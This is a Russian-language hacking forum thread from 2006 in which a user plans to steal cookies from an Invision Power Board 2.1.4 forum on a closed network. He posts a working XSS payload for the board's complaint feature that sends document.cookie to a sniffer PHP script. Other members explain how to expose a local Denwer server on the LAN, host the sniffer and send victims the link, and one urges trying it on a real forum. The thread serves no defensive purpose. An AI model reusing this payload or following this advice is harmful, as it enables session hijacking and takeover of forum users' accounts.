Ipb 2.1.4. форум крутится в закрытой сетке. как правильно настроить сниф? |
25.12.2006, 07:54
|
|
Постоянный
Регистрация: 14.12.2006
Сообщений: 455
С нами:
10214517
Репутация:
44
|
|
Ipb 2.1.4. форум крутится в закрытой сетке. как правильно настроить сниф?
Собстевнно как правильно настроить сниф на денвере локально...
Хочу вытащить куки с ipb 2.1.4 метод понял как а вот
сниф как правильно настроить хз 
Спрашивается а зачем тебе локально то
Да потомучто форум крутится в закрытой сетке в тырнет доступа нет....
Вот вопрочец ещо по xss через функции жалоба
<script>img = new Image(); img.src = "http:/сниффер/сниффер.php?"+location.host+document.cookie ;</script>
Почему собственно сниф в .php я так понимаю что в
версии 2.1.4 нет фильтрации на даный метод и даже не обязательно шифроваться под gif ?! |
|
|
25.12.2006, 08:02
|
|
Участник форума
Регистрация: 26.02.2006
Сообщений: 209
С нами:
10633766
Репутация:
93
|
|
А чё то так и не понял, что ты хочешь!!! в чём у тебя проблема ты не можешь всунуть скрипт в форум, или у тебя проблемы со скриптом, который получит кукки!??
|
|
|
|
25.12.2006, 08:14
|
|
Новичок
Регистрация: 30.08.2006
Сообщений: 16
С нами:
10366612
Репутация:
18
|
|
Собстевнно как правильно настроить сниф на денвере локально...
Хочу вытащить куки с ipb 2.1.4 метод понял как а вот
сниф как правильно настроить хз
Спрашивается а зачем тебе локально то
Да потомучто форум крутится в закрытой сетке в тырнет доступа нет....
ты что-то путаешь - локально, это когда ты обращаешься к скрипту с той же машины на котором он работает адрес в этом случае будет: 127.0.0.1/script.php или localhost/script.php. если тебе нужно обратиться у скрипту из локальной сети, проблемы нет - делаешь это по ip под которым комп зарегестрирован в сети.
вторую часть вопроса вообще не понял, переформулируй его как-нибудь чтоли, распиши подробнее
|
|
|
|
25.12.2006, 08:04
|
|
Постоянный
Регистрация: 14.12.2006
Сообщений: 455
С нами:
10214517
Репутация:
44
|
|
ДА нет хочу сниф настроить локально у себя на вебсерваке так как сетка закрытая...
Вобщем как правильно его натроить чтоб перехватывал куки
Я так понимаю кинуть сниф в папку вебсерва и натроить денвер чтоб он глядел в сеть маловато будет ?!
Последний раз редактировалось karabym; 25.12.2006 в 08:10..
|
|
|
|
25.12.2006, 08:17
|
|
Новичок
Регистрация: 30.08.2006
Сообщений: 16
С нами:
10366612
Репутация:
18
|
|
теперь понял, дополнительной настройки тебе никакой не надо просто ставишь сервак, делаешь дотупным из сети, заливаешь сниффер, кидаешь кому надо ссылку на него, в ней адрес до твоего сервака это твой ip в локальной сети
|
|
|
|
25.12.2006, 08:18
|
|
Постоянный
Регистрация: 14.12.2006
Сообщений: 455
С нами:
10214517
Репутация:
44
|
|
Распишу поподробней :
Есть скрипт снифа кидаю его сюда home\custom\www
в файле .htaccess делаю настройки чтоб порт 80 светился в сетке
далее на форуме юзаю данную xss через функции (жалоба)
Правильно ?! или всеже денвер нужно донастроить чтоб он перехватывал куки...
|
|
|
|
25.12.2006, 08:21
|
|
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
С нами:
10721066
Репутация:
4360
|
|
так понимаю кинуть сниф в папку вебсерва и натроить денвер чтоб он глядел в сеть маловато будет ?!
вполне нормально. так и сделай
|
|
|
|
25.12.2006, 08:21
|
|
Новичок
Регистрация: 30.08.2006
Сообщений: 16
С нами:
10366612
Репутация:
18
|
|
ничего донастраивать не надо, у тебя же куки передаются просто как параметры у скрипта
|
|
|
|
25.12.2006, 08:23
|
|
Участник форума
Регистрация: 29.04.2006
Сообщений: 171
С нами:
10543901
Репутация:
63
|
|
чувак смотри видео и лучьше работай не на денвере если у тебя с этим геморой а с настоящем форумом
|
|
|
|
25.12.2006, 08:23
|
|
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
С нами:
10721066
Репутация:
4360
|
|
def_, угу.. просто будет типа http://yourcomp/sniffer.php?cookie=КУКИСЫ.
Отсюда видно, что достаточно настроить денвер так, чтобы он работал не только локально, а чтобы его было видно и из локалки.
Dmitry507, ты что-то странное куришь) бросай0))
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
